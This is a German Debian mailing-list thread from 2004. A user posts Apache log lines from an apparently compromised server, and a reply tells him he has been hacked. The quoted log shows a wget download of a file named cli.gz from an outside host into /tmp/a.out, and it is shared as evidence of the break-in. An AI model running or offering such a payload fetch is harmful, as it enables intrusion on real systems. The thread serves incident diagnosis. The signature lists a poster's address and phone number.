Hallo Frank,
Am 2004-08-23 20:25:16, schrieb Frank Lorenzen:
> Hallo Liste,
>
> kann mir hier jemand auf die Sprünge helfen, bzw. weiterführende Links
> nennen was ich mir da eingefangen habe?
>
> System ist ein Debian-Woody mit aktuellen Security-Patches.
> und heute:
> [Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
> sysvsem)
> ls: /usr/bin/X11/X: No such file or directory
> sh: option `-c' requires an argument
> ls: /usr/bin/X11/X: No such file or directory
> sh: option `-c' requires an argument
> ls: /usr/bin/X11/X: No such file or directory
> ls: /usr/include/sdk386: No such file or directory
> ls: /usr/bin/X11/X: No such file or directory
> ls: /usr/include/sdk386: No such file or directory
> ls: /usr/bin/X11/X: No such file or directory
> --18:06:28-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... done.
> Connecting to xpire.info[202.99.23.162]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,147 [text/plain]
>
> 0K .......... ........ 100% 20.04
> KB/s
Du bist gehackt...
Schau Dir mal die cli.gz in einem Editor an...
(Es ist keine gnuzipdatei)
Mach das scheiß teil auf alle Fälle nicht executable...
> Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Einträge
> dieser Art feststellen.
> Das Einzige was ich mit google gefunden habe ist
> 'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze für
> einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch
> "Reste" in '/tmp' und einen Prozess 'pra' auf einem tcp-Port.
> Das hatte ich definitiv _nicht_. Weder einen zusätzlichen Port offen,
> noch _irgendwas_ außer bekanntem in '/tmp'.
Vesuche den Sch... gerade zu disassembieren...
Habe allerdings ein kleines Problem mit meiner amd64 Installation
und dem chroot...
> Any Hints?
>
>
> PS: Nein, Sven. Nicht momo.
>
>
> gruss
> f
Greetings
Michelle
--
Linux-User #280138 with the Linux Counter, http://counter.li.org/
Michelle Konzack Apt. 917 ICQ #328449886
50, rue de Soultz MSM LinuxMichi
0033/3/88452356 67100 Strasbourg/France IRC #Debian (irc.icq.com)
Attachment:
signature.pgp
Description: Digital signature